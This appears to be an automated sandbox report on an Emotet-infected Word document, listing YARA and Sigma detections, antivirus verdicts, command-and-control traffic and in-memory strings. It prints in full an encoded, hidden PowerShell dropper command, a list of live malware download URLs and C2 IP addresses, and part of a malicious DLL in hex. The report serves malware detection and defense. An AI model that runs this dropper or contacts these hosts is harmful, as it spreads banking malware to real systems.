15.2.rundll32.exe.170000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.1d0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3e0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.740000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.240000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.3e0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.660000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.5a0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.280000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.200000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.300000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.3e0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1e0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.1d0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1e0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.300000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.140000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3e0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.170000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.250000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.240000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.280000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.410000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.410000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.740000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.5a0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.340000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.410000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2c0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.200000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.250000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 35 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2792, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, ProcessId: 2796

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJ

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://3musketeersent.net/wp-includes/TUgD/	Avira URL Cloud: Label: malware
Source: http://dashudance.com/thinkphp/dgs7Jm9/	Avira URL Cloud: Label: malware
Source: http://shannared.com/content/lhALeS/	Avira URL Cloud: Label: malware
Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/	Avira URL Cloud: Label: malware
Source: http://leopardcranes.com/zynq-linux-yaayf/w/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://3musketeersent.net/wp-includes/TUgD/	Virustotal: Detection: 8%	Perma Link
Source: https://skilmu.com/wp-admin/hQVlB8b/	Virustotal: Detection: 10%	Perma Link
Source: http://jeevanlic.com/wp-content/r8M/	Virustotal: Detection: 14%	Perma Link
Source: http://dashudance.com/thinkphp/dgs7Jm9/	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\Kaktksw\An6othh\N49I.dll

ReversingLabs: Detection: 54%

Multi AV Scanner detection for submitted file

Show sources

Source: ARCH_25_012021.doc	Virustotal: Detection: 16%			Perma Link
Source: ARCH_25_012021.doc	ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\Kaktksw\An6othh\N49I.dll

Joe Sandbox ML: detected

Source: 12.2.rundll32.exe.240000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 8.2.rundll32.exe.740000.1.unpack	Avira: Label: TR/ATRAPS.Gen

Cryptography:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_0028CC2A CryptDecodeObjectEx,

16_2_0028CC2A

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090288416.0000000002930000.00000002.00000001.sdmp

Spreading:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: shannared.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.169.223.13:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.169.223.13:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49166 -> 84.232.229.24:80
Source: Traffic	Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49167 -> 51.255.203.164:8080
Source: Traffic	Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49169 -> 217.160.169.110:8080
Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49171 -> 185.183.16.47:80

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp

String found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/

Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 51.255.203.164:8080
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 217.160.169.110:8080

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Tue, 26 Jan 2021 23:10:16 GMTContent-Disposition: attachment; filename="O9TGnKaUCw.dll"Content-Transfer-Encoding: binarySet-Cookie: 6010a158c3613=1611702616; expires=Tue, 26-Jan-2021 23:11:16 GMT; Max-Age=60; path=/Last-Modified: Tue, 26 Jan 2021 23:10:16 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: application/octet-streamX-Cacheable: YES:ForcedContent-Length: 631808Accept-Ranges: bytesDate: Tue, 26 Jan 2021 23:10:16 GMTAge: 0Vary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*

Source: global traffic

HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 84.232.229.24 84.232.229.24
Source: Joe Sandbox View	IP Address: 192.169.223.13 192.169.223.13

Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.16.47

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5248432-B174-499E-B3BD-E7523F18DF93}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: shannared.com

Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://jeevanlic.com/wp-content/r8M/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
Source: powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2095818604.0000000003CE6000.00000004.00000001.sdmp	String found in binary or memory: http://shannared.com
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: http://shannared.com/content/lhALeS/
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp	String found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, type: MEMORY
